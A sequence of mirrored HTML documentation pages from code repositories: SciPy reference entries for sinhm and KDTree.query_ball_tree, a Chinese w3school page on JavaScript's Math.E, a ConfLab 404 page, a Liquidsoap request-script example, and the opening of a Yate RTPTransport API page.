<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>scipy.linalg.sinhm &mdash; SciPy v0.16.1 Reference Guide</title> <link rel="stylesheet" type="text/css" href="../static_/css/spc-bootstrap.css"> <link rel="stylesheet" type="text/css" href="../static_/css/spc-extend.css"> <link rel="stylesheet" href="../static_/scipy.css" type="text/css" > <link rel="stylesheet" href="../static_/pygments.css" type="text/css" > <script type="text/javascript"> var DOCUMENTATION_OPTIONS = { URL_ROOT: '../', VERSION: '0.16.1', COLLAPSE_INDEX: false, FILE_SUFFIX: '.html', HAS_SOURCE: false }; </script> <script type="text/javascript" src="../static_/jquery.js"></script> <script type="text/javascript" src="../static_/underscore.js"></script> <script type="text/javascript" src="../static_/doctools.js"></script> <script type="text/javascript" src="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script> <script type="text/javascript" src="../static_/js/copybutton.js"></script> <link rel="top" title="SciPy v0.16.1 Reference Guide" href="../index.html" > <link rel="up" title="Linear algebra (scipy.linalg)" href="../linalg.html" > <link rel="next" title="scipy.linalg.tanhm" href="scipy.linalg.tanhm.html" > <link rel="prev" title="scipy.linalg.coshm" href="scipy.linalg.coshm.html" > </head> <body> <div class="container"> <div class="header"> </div> </div> <div class="container"> <div class="main"> <div class="row-fluid"> <div class="span12"> <div class="spc-navbar"> <ul class="nav nav-pills pull-left"> <li class="active"><a href="../index.html">SciPy v0.16.1 Reference Guide</a></li> <li class="active"><a href="../linalg.html" accesskey="U">Linear algebra (<tt class="docutils literal"><span class="pre">scipy.linalg</span></tt>)</a></li> </ul> <ul class="nav nav-pills pull-right"> <li class="active"> <a href="../genindex.html" title="General Index" accesskey="I">index</a> </li> <li class="active"> <a href="../py-modindex.html" title="Python Module Index" >modules</a> </li> <li class="active"> <a href="../scipy-optimize-modindex.html" title="Python Module Index" >modules</a> </li> <li class="active"> <a href="scipy.linalg.tanhm.html" title="scipy.linalg.tanhm" accesskey="N">next</a> </li> <li class="active"> <a href="scipy.linalg.coshm.html" title="scipy.linalg.coshm" accesskey="P">previous</a> </li> </ul> </div> </div> </div> <div class="row-fluid"> <div class="spc-rightsidebar span3"> <div class="sphinxsidebarwrapper"> <p class="logo"><a href="../index.html"> <img class="logo" src="../static_/scipyshiny_small.png" alt="Logo"> </a></p> <h4>Previous topic</h4> <p class="topless"><a href="scipy.linalg.coshm.html" title="previous chapter">scipy.linalg.coshm</a></p> <h4>Next topic</h4> <p class="topless"><a href="scipy.linalg.tanhm.html" title="next chapter">scipy.linalg.tanhm</a></p> </div> </div> <div class="span9"> <div class="bodywrapper"> <div class="body" id="spc-section-body"> <div class="section" id="scipy-linalg-sinhm"> <h1>scipy.linalg.sinhm<a class="headerlink" href="#scipy-linalg-sinhm" title="Permalink to this headline">¶</a></h1> <dl class="function"> <dt id="scipy.linalg.sinhm"> <tt class="descclassname">scipy.linalg.</tt><tt class="descname">sinhm</tt><big>(</big><em>A</em><big>)</big><a class="reference external" href="http://github.com/scipy/scipy/blob/v0.16.1/scipy/linalg/matfuncs.py#L482"><span class="viewcode-link">[source]</span></a><a class="headerlink" href="#scipy.linalg.sinhm" title="Permalink to this definition">¶</a></dt> <dd><p>Compute the hyperbolic matrix sine.</p> <p>This routine uses expm to compute the matrix exponentials.</p> <table class="docutils field-list" frame="void" rules="none"> <col class="field-name" /> <col class="field-body" /> <tbody valign="top"> <tr class="field-odd field"><th class="field-name">Parameters:</th><td class="field-body"><p class="first"><strong>A</strong> : (N, N) array_like</p> <blockquote> <div><p>Input array.</p> </div></blockquote> </td> </tr> <tr class="field-even field"><th class="field-name">Returns:</th><td class="field-body"><p class="first"><strong>sinhm</strong> : (N, N) ndarray</p> <blockquote class="last"> <div><p>Hyperbolic matrix sine of <em class="xref py py-obj">A</em></p> </div></blockquote> </td> </tr> </tbody> </table> <p class="rubric">Examples</p> <div class="highlight-python"><div class="highlight"><pre><span class="gp">&gt;&gt;&gt; </span><span class="kn">from</span> <span class="nn">scipy.linalg</span> <span class="kn">import</span> <span class="n">tanhm</span><span class="p">,</span> <span class="n">sinhm</span><span class="p">,</span> <span class="n">coshm</span> <span class="gp">&gt;&gt;&gt; </span><span class="n">a</span> <span class="o">=</span> <span class="n">np</span><span class="o">.</span><span class="n">array</span><span class="p">([[</span><span class="mf">1.0</span><span class="p">,</span> <span class="mf">3.0</span><span class="p">],</span> <span class="p">[</span><span class="mf">1.0</span><span class="p">,</span> <span class="mf">4.0</span><span class="p">]])</span> <span class="gp">&gt;&gt;&gt; </span><span class="n">s</span> <span class="o">=</span> <span class="n">sinhm</span><span class="p">(</span><span class="n">a</span><span class="p">)</span> <span class="gp">&gt;&gt;&gt; </span><span class="n">s</span> <span class="go">array([[ 10.57300653, 39.28826594],</span> <span class="go"> [ 13.09608865, 49.86127247]])</span> </pre></div> </div> <p>Verify tanhm(a) = sinhm(a).dot(inv(coshm(a)))</p> <div class="highlight-python"><div class="highlight"><pre><span class="gp">&gt;&gt;&gt; </span><span class="n">t</span> <span class="o">=</span> <span class="n">tanhm</span><span class="p">(</span><span class="n">a</span><span class="p">)</span> <span class="gp">&gt;&gt;&gt; </span><span class="n">c</span> <span class="o">=</span> <span class="n">coshm</span><span class="p">(</span><span class="n">a</span><span class="p">)</span> <span class="gp">&gt;&gt;&gt; </span><span class="n">t</span> <span class="o">-</span> <span class="n">s</span><span class="o">.</span><span class="n">dot</span><span class="p">(</span><span class="n">np</span><span class="o">.</span><span class="n">linalg</span><span class="o">.</span><span class="n">inv</span><span class="p">(</span><span class="n">c</span><span class="p">))</span> <span class="go">array([[ 2.72004641e-15, 4.55191440e-15],</span> <span class="go"> [ 0.00000000e+00, -5.55111512e-16]])</span> </pre></div> </div> </dd></dl> </div> </div> </div> </div> </div> </div> </div> <div class="container container-navbar-bottom"> <div class="spc-navbar"> </div> </div> <div class="container"> <div class="footer"> <div class="row-fluid"> <ul class="inline pull-left"> <li> &copy; Copyright 2008-2014, The Scipy community. </li> <li> Last updated on Oct 24, 2015. </li> <li> Created using <a href="http://sphinx.pocoo.org/">Sphinx</a> 1.2.1. </li> </ul> </div> </div> </div> </body> </html>
Coding/W3School/W3CN/www.w3school.com.cn/jsref/jsref_e.html
platinhom/ManualHom
<!DOCTYPE html> <html lang="zh-cn"> <!-- Mirrored from www.w3school.com.cn/jsref/jsref_e.asp by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 02 Dec 2015 06:35:44 GMT --> <head> <meta charset="utf-8" /> <meta name="robots" content="all" /> <meta name="author" content="w3school.com.cn" /> <link rel="stylesheet" type="text/css" href="../c5.css" /> <title>JavaScript E 属性</title> </head> <body class="browserscripting" id="jsref"> <div id="wrapper"> <div id="header"> <a href="../index-2.html" title="w3school 在线教程" style="float:left;">w3school 在线教程</a> <div id="ad_head"> <script type="text/javascript"><!-- google_ad_client = "pub-3381531532877742"; /* 728x90, 创建于 08-12-1 */ google_ad_slot = "7423315034"; google_ad_width = 728; google_ad_height = 90; //--> </script> <script type="text/javascript" src="../../pagead2.googlesyndication.com/pagead/f.txt"> </script> </div> </div> <div id="navfirst"> <ul id="menu"> <li id="h"><a href="../h.html" title="HTML 系列教程">HTML 系列教程</a></li> <li id="b"><a href="../b.html" title="浏览器脚本教程">浏览器脚本</a></li> <li id="s"><a href="../s.html" title="服务器脚本教程">服务器脚本</a></li> <li id="d"><a href="../d.html" title="ASP.NET 教程">ASP.NET 教程</a></li> <li id="x"><a href="../x.html" title="XML 系列教程">XML 系列教程</a></li> <li id="ws"><a href="../ws.html" title="Web Services 系列教程">Web Services 系列教程</a></li> <li id="w"><a href="../w.html" title="建站手册">建站手册</a></li> </ul> </div> <div id="navsecond"> <div id="course"><h2>JS & DOM 参考手册</h2> <ul> <li><a href="index.html" title="JavaScript 和 HTML DOM 参考手册">参考手册目录</a></li> </ul> <h2>JavaScript 对象</h2> <ul> <li><a href="jsref_obj_array.html" title="JavaScript Array 对象参考手册">JS Array</a></li> <li><a href="jsref_obj_boolean.html" title="JavaScript Boolean 对象参考手册">JS Boolean</a></li> <li><a href="jsref_obj_date.html" title="JavaScript Date 对象参考手册">JS Date</a></li> <li><a href="jsref_obj_math.asp" title="JavaScript Math 对象的参考手册">JS Math</a></li> <li><a href="jsref_obj_number.html" title="JavaScript Number 对象参考手册">JS Number</a></li> <li><a href="jsref_obj_string.html" title="JavaScript String 对象参考手册">JS String</a></li> <li><a href="jsref_obj_regexp.html" title="JavaScript RegExp 对象参考手册">JS RegExp</a></li> <li><a href="jsref_obj_global.html" title="JavaScript 全局对象参考手册">JS Functions</a></li> <li><a href="jsref_events.html" title="JavaScript 事件参考手册">JS Events</a></li> </ul> <h2>Browser 对象</h2> <ul> <li><a href="dom_obj_window.html" title="HTML DOM Window 对象">Window</a></li> <li><a href="dom_obj_navigator.asp" title="HTML DOM Navigator 对象">Navigator</a></li> <li><a href="dom_obj_screen.html" title="HTML DOM Screen 对象">Screen</a></li> <li><a href="dom_obj_history.html" title="HTML DOM History 对象">History</a></li> <li><a href="dom_obj_location.html" title="HTML DOM Location 对象">Location</a></li> </ul> <h2>HTML DOM 对象</h2> <ul> <li><a href="dom_obj_document.html" title="HTML DOM Document 对象">DOM Document</a></li> <li><a href="dom_obj_all.html" title="HTML DOM Element 对象">DOM Element</a></li> <li><a href="dom_obj_attributes.html" title="HTML DOM Attribute 对象">DOM Attribute</a></li> <li><a href="dom_obj_event.html" title="HTML DOM Event 对象">DOM Event</a></li> </ul> <h2>HTML 对象</h2> <ul> <li><a href="dom_obj_anchor.html" title="HTML DOM Anchor 对象">&lt;a&gt;</a></li> <li><a href="dom_obj_area.html" title="HTML DOM Area 对象">&lt;area&gt;</a></li> <li><a href="dom_obj_audio.html" title="HTML DOM Audio 对象">&lt;audio&gt;</a></li> <li><a href="dom_obj_base.html" title="HTML DOM Base 对象">&lt;base&gt;</a></li> <li><a href="dom_obj_body.html" title="HTML DOM Body 对象">&lt;body&gt;</a></li> <li><a href="dom_obj_blockquote.html" title="HTML DOM Blockquote 对象">&lt;blockquote&gt;</a></li> <li><a href="dom_obj_pushbutton.html" title="HTML DOM Button 对象">&lt;button&gt;</a></li> <li><a href="dom_obj_canvas.html" title="HTML DOM Canvas 对象">&lt;canvas&gt;</a></li> <li><a href="dom_obj_col.html" title="HTML DOM Column 对象">&lt;col&gt;</a></li> <li><a href="dom_obj_colgroup.html" title="HTML DOM ColumnGroup 对象">&lt;colgroup&gt;</a></li> <li><a href="dom_obj_datalist.html" title="HTML DOM Datalist 对象">&lt;datalist&gt;</a></li> <li><a href="dom_obj_del.html" title="HTML DOM Del 对象">&lt;del&gt;</a></li> <li><a href="dom_obj_details.html" title="HTML DOM Details 对象">&lt;details&gt;</a></li> <li><a href="dom_obj_dialog.html" title="HTML DOM Dialog 对象">&lt;dialog&gt;</a></li> <li><a href="dom_obj_embed.html" title="HTML DOM Embed 对象">&lt;embed&gt;</a></li> <li><a href="dom_obj_fieldset.asp" title="HTML DOM Fieldset 对象">&lt;fieldset&gt;</a></li> <li><a href="dom_obj_form.html" title="HTML DOM Form 对象">&lt;form&gt;</a></li> <li><a href="dom_obj_frame.html" title="HTML DOM Frame 对象">&lt;frame&gt;</a></li> <li><a href="dom_obj_frameset.html" title="HTML DOM Frameset 对象">&lt;frameset&gt;</a></li> <li><a href="dom_obj_iframe.asp" title="HTML DOM IFrame 对象">&lt;iframe&gt;</a></li> <li><a href="dom_obj_image.html" title="HTML DOM Image 对象">&lt;img&gt;</a></li> <li><a href="dom_obj_ins.asp" title="HTML DOM Ins 对象">&lt;ins&gt;</a></li> <li><a href="dom_obj_button.html" title="HTML DOM Button 对象">&lt;input&gt; button</a></li> <li><a href="dom_obj_checkbox.html" title="HTML DOM Checkbox 对象">&lt;input&gt; checkbox</a></li> <li><a href="dom_obj_color.html" title="HTML DOM Color 对象">&lt;input&gt; color</a></li> <li><a href="dom_obj_date.html" title="HTML DOM Input Date 对象">&lt;input&gt; date</a></li> <li><a href="dom_obj_datetime.html" title="HTML DOM Datetime 对象">&lt;input&gt; datetime</a></li> <li><a href="dom_obj_datetime-local.html" title="HTML DOM Datetime Local 对象">&lt;input&gt; datetime-local</a></li> <li><a href="dom_obj_email.html" title="HTML DOM Email 对象">&lt;input&gt; email</a></li> <li><a href="dom_obj_fileupload.html" title="HTML DOM FileUpload 对象">&lt;input&gt; file</a></li> <li><a href="dom_obj_hidden.html" title="HTML DOM Hidden 对象">&lt;input&gt; hidden</a></li> <li><a href="dom_obj_input_image.html" title="HTML DOM Input Image 对象">&lt;input&gt; image</a></li> <li><a href="dom_obj_month.html" title="HTML DOM Month 对象">&lt;input&gt; month</a></li> <li><a href="dom_obj_number.html" title="HTML DOM Number 对象">&lt;input&gt; number</a></li> <li><a href="dom_obj_password.html" title="HTML DOM Password 对象">&lt;input&gt; password</a></li> <li><a href="dom_obj_range.asp" title="HTML DOM Input Range 对象">&lt;input&gt; range</a></li> <li><a href="dom_obj_radio.html" title="HTML DOM Radio 对象">&lt;input&gt; radio</a></li> <li><a href="dom_obj_reset.html" title="HTML DOM Reset 对象">&lt;input&gt; reset</a></li> <li><a href="dom_obj_search.html" title="HTML DOM Input Search 对象">&lt;input&gt; search</a></li> <li><a href="dom_obj_submit.html" title="HTML DOM Submit 对象">&lt;input&gt; submit</a></li> <li><a href="dom_obj_text.asp" title="HTML DOM Text 对象">&lt;input&gt; text</a></li> <li><a href="dom_obj_input_time.html" title="HTML DOM Input Time 对象">&lt;input&gt; time</a></li> <li><a href="dom_obj_url.html" title="HTML DOM Input URL 对象">&lt;input&gt; url</a></li> <li><a href="dom_obj_week.html" title="HTML DOM Week 对象">&lt;input&gt; week</a></li> <li><a href="dom_obj_keygen.asp" title="HTML DOM Keygen 对象">&lt;keygen&gt;</a></li> <li><a href="dom_obj_label.html" title="HTML DOM Label 对象">&lt;label&gt;</a></li> <li><a href="dom_obj_legend.html" title="HTML DOM Legend 对象">&lt;legend&gt;</a></li> <li><a href="dom_obj_li.html" title="HTML DOM Li 对象">&lt;li&gt;</a></li> <li><a href="dom_obj_link.html" title="HTML DOM Link 对象">&lt;link&gt;</a></li> <li><a href="dom_obj_map.html" title="HTML DOM Map 对象">&lt;map&gt;</a></li> <li><a href="dom_obj_menu.html" title="HTML DOM Menu 对象">&lt;menu&gt;</a></li> <li><a href="dom_obj_menuitem.html" title="HTML DOM MenuItem 对象">&lt;menuitem&gt;</a></li> <li><a href="dom_obj_meta.html" title="HTML DOM Meta 对象">&lt;meta&gt;</a></li> <li><a href="dom_obj_meter.html" title="HTML DOM Meter 对象">&lt;meter&gt;</a></li> <li><a href="dom_obj_object.html" title="HTML DOM Object 对象">&lt;object&gt;</a></li> <li><a href="dom_obj_ol.html" title="HTML DOM Ol 对象">&lt;ol&gt;</a></li> <li><a href="dom_obj_optgroup.html" title="HTML DOM OptionGroup 对象">&lt;optgroup&gt;</a></li> <li><a href="dom_obj_option.html" title="HTML DOM Option 对象">&lt;option&gt;</a></li> <li><a href="dom_obj_param.html" title="HTML DOM Parameter 对象">&lt;param&gt;</a></li> <li><a href="dom_obj_progress.html" title="HTML DOM Progress 对象">&lt;progress&gt;</a></li> <li><a href="dom_obj_quote.html" title="HTML DOM Quote 对象">&lt;q&gt;</a></li> <li><a href="dom_obj_script.html" title="HTML DOM Script 对象">&lt;script&gt;</a></li> <li><a href="dom_obj_select.html" title="HTML DOM Select 对象">&lt;select&gt;</a></li> <li><a href="dom_obj_source.html" title="HTML DOM Source 对象">&lt;source&gt;</a></li> <li><a href="dom_obj_style.html" title="HTML DOM Style 对象">&lt;style&gt;</a></li> <li><a href="dom_obj_table.html" title="HTML DOM Table 对象">&lt;table&gt;</a></li> <li><a href="dom_obj_tabledata.html" title="HTML DOM TableCell 对象">&lt;td&gt;</a></li> <li><a href="dom_obj_tablehead.html" title="HTML DOM TableHeader 对象">&lt;th&gt;</a></li> <li><a href="dom_obj_tablerow.html" title="HTML DOM TableRow 对象">&lt;tr&gt;</a></li> <li><a href="dom_obj_textarea.html" title="HTML DOM Textarea 对象">&lt;textarea&gt;</a></li> <li><a href="dom_obj_time.html" title="HTML DOM Time 对象">&lt;time&gt;</a></li> <li><a href="dom_obj_title.html" title="HTML DOM Title 对象">&lt;title&gt;</a></li> <li><a href="dom_obj_track.html" title="HTML DOM Track 对象">&lt;track&gt;</a></li> <li><a href="dom_obj_video.html" title="HTML DOM Video 对象">&lt;video&gt;</a></li> </ul> </div><div id="selected"> <h2>建站手册</h2> <ul> <li><a href="../site/index.html" title="网站构建">网站构建</a></li> <li><a href="../w3c/index.html" title="万维网联盟 (W3C)">万维网联盟 (W3C)</a></li> <li><a href="../browsers/index.html" title="浏览器信息">浏览器信息</a></li> <li><a href="../quality/index.html" title="网站品质">网站品质</a></li> <li><a href="../semweb/index.html" title="语义网">语义网</a></li> <li><a href="../careers/index.asp" title="职业规划">职业规划</a></li> <li><a href="../hosting/index.html" title="网站主机">网站主机</a></li> </ul> <h2><a href="../about/index.html" title="关于 W3School" id="link_about">关于 W3School</a></h2> <h2><a href="../about/about_helping.html" title="帮助 W3School" id="link_help">帮助 W3School</a></h2> </div> </div> <div id="maincontent"> <h1>JavaScript E 属性</h1> <div class="backtoreference"> <p><a href="jsref_obj_math.asp" title="JavaScript Math 对象">JavaScript Math 对象</a></p> </div> <div> <h2>定义和用法</h2> <p>Math.E 属性代表算术常量 e,即自然对数的底数,其值近似于 2.71828。</p> <h3>语法</h3> <pre>Math.E</pre> </div> <div> <h2>实例</h2> <p>返回 Euler 数:</p> <pre>&lt;script type=&quot;text/javascript&quot;&gt; document.write(&quot;Euler's number: &quot; + <code>Math.E</code>); &lt;/script&gt;</pre> <p>输出:</p> <pre>Euler's number: 2.718281828459045</pre> <p class="tiy"><a target="_blank" href="../tiy/t56c1.asp?f=jseg_e">TIY</a></p> </div> <div class="backtoreference"> <p><a href="jsref_obj_math.asp" title="JavaScript Math 对象">JavaScript Math 对象</a></p> </div> </div> <!-- maincontent end --> <div id="sidebar"> <div id="searchui"> <form method="get" id="searchform" action="http://www.google.com.hk/search"> <p><label for="searched_content">Search:</label></p> <p><input type="hidden" name="sitesearch" value="w3school.com.cn" /></p> <p> <input type="text" name="as_q" class="box" id="searched_content" title="在此输入搜索内容。" /> <input type="submit" value="Go" class="button" title="搜索!" /> </p> </form> </div> <div id="tools"> <h5 id="tools_reference"><a href="index.html">JavaScript 参考手册</a></h5> <h5 id="tools_example"><a href="../example/jseg_examples.html">JavaScript 实例</a></h5> <h5 id="tools_quiz"><a href="../js/js_quiz.html">JavaScript 测验</a></h5> </div> <div id="ad"> <script type="text/javascript"><!-- google_ad_client = "ca-pub-3381531532877742"; /* sidebar-160x600 */ google_ad_slot = "3772569310"; google_ad_width = 160; google_ad_height = 600; //--> </script> <script type="text/javascript" src="../../pagead2.googlesyndication.com/pagead/f.txt"> </script> </div> </div> <div id="footer"> <p> W3School 提供的内容仅用于培训。我们不保证内容的正确性。通过使用本站内容随之而来的风险与本站无关。W3School 简体中文版的所有内容仅供测试,对任何法律问题及风险不承担任何责任。 </p> <p> 当使用本站时,代表您已接受了本站的<a href="../about/about_use.html" title="关于使用">使用条款</a>和<a href="../about/about_privacy.html" title="关于隐私">隐私条款</a>。版权所有,保留一切权利。 赞助商:<a href="http://www.yktz.net/" title="上海赢科投资有限公司">上海赢科投资有限公司</a>。 <a href="http://www.miitbeian.gov.cn/">蒙ICP备06004630号</a> </p> </div> </div> <!-- wrapper end --> </body> <!-- Mirrored from www.w3school.com.cn/jsref/jsref_e.asp by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 02 Dec 2015 06:36:05 GMT --> </html>
Coding/Python/scipy-html-0.16.1/generated/scipy.spatial.KDTree.query_ball_tree.html
platinhom/ManualHom
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>scipy.spatial.KDTree.query_ball_tree &mdash; SciPy v0.16.1 Reference Guide</title> <link rel="stylesheet" type="text/css" href="../static_/css/spc-bootstrap.css"> <link rel="stylesheet" type="text/css" href="../static_/css/spc-extend.css"> <link rel="stylesheet" href="../static_/scipy.css" type="text/css" > <link rel="stylesheet" href="../static_/pygments.css" type="text/css" > <script type="text/javascript"> var DOCUMENTATION_OPTIONS = { URL_ROOT: '../', VERSION: '0.16.1', COLLAPSE_INDEX: false, FILE_SUFFIX: '.html', HAS_SOURCE: false }; </script> <script type="text/javascript" src="../static_/jquery.js"></script> <script type="text/javascript" src="../static_/underscore.js"></script> <script type="text/javascript" src="../static_/doctools.js"></script> <script type="text/javascript" src="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script> <script type="text/javascript" src="../static_/js/copybutton.js"></script> <link rel="top" title="SciPy v0.16.1 Reference Guide" href="../index.html" > <link rel="up" title="scipy.spatial.KDTree" href="scipy.spatial.KDTree.html" > <link rel="next" title="scipy.spatial.KDTree.query_pairs" href="scipy.spatial.KDTree.query_pairs.html" > <link rel="prev" title="scipy.spatial.KDTree.query_ball_point" href="scipy.spatial.KDTree.query_ball_point.html" > </head> <body> <div class="container"> <div class="header"> </div> </div> <div class="container"> <div class="main"> <div class="row-fluid"> <div class="span12"> <div class="spc-navbar"> <ul class="nav nav-pills pull-left"> <li class="active"><a href="../index.html">SciPy v0.16.1 Reference Guide</a></li> <li class="active"><a href="../spatial.html" >Spatial algorithms and data structures (<tt class="docutils literal"><span class="pre">scipy.spatial</span></tt>)</a></li> <li class="active"><a href="scipy.spatial.KDTree.html" accesskey="U">scipy.spatial.KDTree</a></li> </ul> <ul class="nav nav-pills pull-right"> <li class="active"> <a href="../genindex.html" title="General Index" accesskey="I">index</a> </li> <li class="active"> <a href="../py-modindex.html" title="Python Module Index" >modules</a> </li> <li class="active"> <a href="../scipy-optimize-modindex.html" title="Python Module Index" >modules</a> </li> <li class="active"> <a href="scipy.spatial.KDTree.query_pairs.html" title="scipy.spatial.KDTree.query_pairs" accesskey="N">next</a> </li> <li class="active"> <a href="scipy.spatial.KDTree.query_ball_point.html" title="scipy.spatial.KDTree.query_ball_point" accesskey="P">previous</a> </li> </ul> </div> </div> </div> <div class="row-fluid"> <div class="spc-rightsidebar span3"> <div class="sphinxsidebarwrapper"> <p class="logo"><a href="../index.html"> <img class="logo" src="../static_/scipyshiny_small.png" alt="Logo"> </a></p> <h4>Previous topic</h4> <p class="topless"><a href="scipy.spatial.KDTree.query_ball_point.html" title="previous chapter">scipy.spatial.KDTree.query_ball_point</a></p> <h4>Next topic</h4> <p class="topless"><a href="scipy.spatial.KDTree.query_pairs.html" title="next chapter">scipy.spatial.KDTree.query_pairs</a></p> </div> </div> <div class="span9"> <div class="bodywrapper"> <div class="body" id="spc-section-body"> <div class="section" id="scipy-spatial-kdtree-query-ball-tree"> <h1>scipy.spatial.KDTree.query_ball_tree<a class="headerlink" href="#scipy-spatial-kdtree-query-ball-tree" title="Permalink to this headline">¶</a></h1> <dl class="method"> <dt id="scipy.spatial.KDTree.query_ball_tree"> <tt class="descclassname">KDTree.</tt><tt class="descname">query_ball_tree</tt><big>(</big><em>other</em>, <em>r</em>, <em>p=2.0</em>, <em>eps=0</em><big>)</big><a class="reference external" href="http://github.com/scipy/scipy/blob/v0.16.1/scipy/spatial/kdtree.py#L612"><span class="viewcode-link">[source]</span></a><a class="headerlink" href="#scipy.spatial.KDTree.query_ball_tree" title="Permalink to this definition">¶</a></dt> <dd><p>Find all pairs of points whose distance is at most r</p> <table class="docutils field-list" frame="void" rules="none"> <col class="field-name" /> <col class="field-body" /> <tbody valign="top"> <tr class="field-odd field"><th class="field-name">Parameters:</th><td class="field-body"><p class="first"><strong>other</strong> : KDTree instance</p> <blockquote> <div><p>The tree containing points to search against.</p> </div></blockquote> <p><strong>r</strong> : float</p> <blockquote> <div><p>The maximum distance, has to be positive.</p> </div></blockquote> <p><strong>p</strong> : float, optional</p> <blockquote> <div><p>Which Minkowski norm to use. <em class="xref py py-obj">p</em> has to meet the condition <tt class="docutils literal"><span class="pre">1</span> <span class="pre">&lt;=</span> <span class="pre">p</span> <span class="pre">&lt;=</span> <span class="pre">infinity</span></tt>.</p> </div></blockquote> <p><strong>eps</strong> : float, optional</p> <blockquote> <div><p>Approximate search. Branches of the tree are not explored if their nearest points are further than <tt class="docutils literal"><span class="pre">r/(1+eps)</span></tt>, and branches are added in bulk if their furthest points are nearer than <tt class="docutils literal"><span class="pre">r</span> <span class="pre">*</span> <span class="pre">(1+eps)</span></tt>. <em class="xref py py-obj">eps</em> has to be non-negative.</p> </div></blockquote> </td> </tr> <tr class="field-even field"><th class="field-name">Returns:</th><td class="field-body"><p class="first"><strong>results</strong> : list of lists</p> <blockquote class="last"> <div><p>For each element <tt class="docutils literal"><span class="pre">self.data[i]</span></tt> of this tree, <tt class="docutils literal"><span class="pre">results[i]</span></tt> is a list of the indices of its neighbors in <tt class="docutils literal"><span class="pre">other.data</span></tt>.</p> </div></blockquote> </td> </tr> </tbody> </table> </dd></dl> </div> </div> </div> </div> </div> </div> </div> <div class="container container-navbar-bottom"> <div class="spc-navbar"> </div> </div> <div class="container"> <div class="footer"> <div class="row-fluid"> <ul class="inline pull-left"> <li> &copy; Copyright 2008-2014, The Scipy community. </li> <li> Last updated on Oct 24, 2015. </li> <li> Created using <a href="http://sphinx.pocoo.org/">Sphinx</a> 1.2.1. </li> </ul> </div> </div> </div> </body> </html>
src/main/resources/static/404.html
vitalii-dmytruk/ConfLab
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>ConfLab main page</title> <link rel="stylesheet" href="lib/bootstrap/css/bootstrap.css"> <link rel="stylesheet" href="lib/select2/css/select2.css"> <link rel="stylesheet" href="lib/select2-bootstrap-theme/select2-bootstrap.css"> <link rel="stylesheet" href="css/conflab.css"> </head> <body> <div> <img src="img/homepage.png" class="img-responsive center-block"/> <h3 align="center">Page not found</h3> </div> </body> </html>
website/orig/legacy/doc-1.3.3/scripts/on2_p2_get_request.html
savonet/liquidsoap-full
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="content-type" content="text/html; charset=UTF-8" /> <title>Liquidsoap 1.3.3 :: Audio Stream Generation</title> <link href="../../css/new.css" type="text/css" rel="stylesheet" /> <script type="text/javascript" src="//www.google.com/jsapi"></script> <link rel="shortcut icon" href="../favicon.ico" /> <script> google.load("jquery", "1.6.1"); google.load("jqueryui", "1.8.14"); </script> <script type="text/javascript" src="../../js/jQuery.syntax/jquery.syntax.min.js"></script> <script type="text/javascript" src="../../js/liq-jquery.js"></script> </head> <body> <div class="menu"> <ul> <li id="menu-developers"> <a href="https://github.com/savonet/liquidsoap/issues" target="_blank">developpers</a> </li> <li id="menu-doc-api-www"> <a href="../reference.html">API</a> </li> <li id="menu-support"> <a href="documentation.html">documentation</a> </li> <li id="menu-download"> <a href="../../download.html">download</a> </li> <li id="menu-about"> <a href="../../index.html">about</a> </li> </ul> </div> <div class="section" id="main"> <h1>on2_p2_get_request.liq</h1> <div class="content"> <pre class="syntax"># Our custom request function def get_request() = # Get the URI uri = list.hd(default="",get_process_lines("cat /tmp/request")) # Create a request request.create(uri) end </pre> <a href="on2_p2_get_request.liq"> <img class="grab" src="../../images/grab.png" alt="Grab the code!" title="Grab the code!"> </a> </div> <div id="footer"> 2003-2017 Savonet team</div> </div> <script type="text/javascript" src="//www.google.com/cse/brand?form=cse-search-box&amp;lang=en"></script> <script type="text/javascript" src="../../js/search.js"></script> <script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-927362-1']); _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script> </body> </html>
docs/api/TelEngine__RTPTransport.html
cvsuser-chromium/yate
<HTML> <HEAD> <TITLE>class RTPTransport</TITLE> <META NAME="Generator" CONTENT="KDOC "> </HEAD> <BODY bgcolor="#ffffff" text="#000000" link="#0000ff" vlink="#000099" alink= "#ffffff"> <TABLE WIDTH="100%" BORDER="0"> <TR> <TD> <TABLE BORDER="0"> <TR><TD valign="top" align="left" cellspacing="10"> <h1>class RTPTransport</h1> </TD> <TD valign="top" align="right" colspan="1">Low level transport for RTP and RTCP. <small><A HREF="#longdesc">More...</A></small></TD></TR> </TABLE> <HR> <TABLE BORDER="0"> <TR><TH>Full name</TH><TD><code><A HREF="TelEngine.html">TelEngine</A>::RTPTransport</code></TD></TR> <TR><TH>Definition</TH><TD><code>#include &lt;<A HREF="libs___yrtp___yatertp_h.html">libs/yrtp/yatertp.h</A>&gt;</code></TD></TR> <TR><TH>Inherits</TH><TD><i><A HREF="TelEngine__RTPProcessor.html">TelEngine::RTPProcessor</A></i> <small>[public ]</small></TD></TR> <TR><TH><A HREF="full-list-TelEngine__RTPTransport.html">List of all Methods</A></TH></TR> </TABLE> </TD> <TD align="right"><TABLE BORDER="0"><TR><TD><small><A HREF="index-long.html">Annotated List</A></small></TD></TR> <TR><TD><small><A HREF="header-list.html">Files</A></small></TD></TR> <TR><TD><small><A HREF="all-globals.html">Globals</A></small></TD></TR> <TR><TD><small><A HREF="hier.html">Hierarchy</A></small></TD></TR> <TR><TD><small><A HREF="index.html">Index</A></small></TD></TR> </TABLE></TD></TR></TABLE> <h4>Public Types</h4><ul><LI>enum <A HREF="#ref1">Activation</A> { Inactive, Bound, Active } </LI> 